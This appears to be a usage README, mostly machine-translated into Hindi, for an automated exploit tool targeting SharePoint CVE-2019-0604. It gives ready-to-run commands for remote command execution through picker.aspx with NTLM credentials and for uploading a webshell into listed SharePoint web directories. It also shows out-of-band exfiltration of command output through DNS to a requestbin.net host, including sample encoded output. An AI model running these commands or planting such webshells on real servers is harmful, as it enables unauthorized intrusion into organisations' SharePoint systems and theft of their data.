
शेयरपॉइंट CVE-2019-0604 का शोषण करने के लिए स्वचालित उपकरण
CVE-2019-0604 को अधिकतम करने के लिए स्वचालित शोषण उपकरण।
requirements.txt फ़ाइल में इस उपकरण द्वारा उपयोग की जाने वाली सभी Python लाइब्रेरियाँ सूचीबद्ध होनी चाहिए, और उन्हें इसका उपयोग करके स्थापित किया जाएगा
$ pip install -r requirements.txt
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
कुछ भी शानदार अपलोड करें (वेबशेल, recon टूल ...)
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
BurpSuite (Pro) में collaborator_http_api.py स्थापित करें?
सुनिश्चित करें कि BurpSuite इस शोषण के साथ एक ही मशीन पर चल रहा है।
फायर करें, प्राप्त आउटपुट का आनंद लें :)
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
DNS से डेटा प्राप्त करें
2050524956494c4547455320494e464f524d4154494f4e
...
अपने आप डिकोड करें :)
PRIVILEGES INFORMATION
...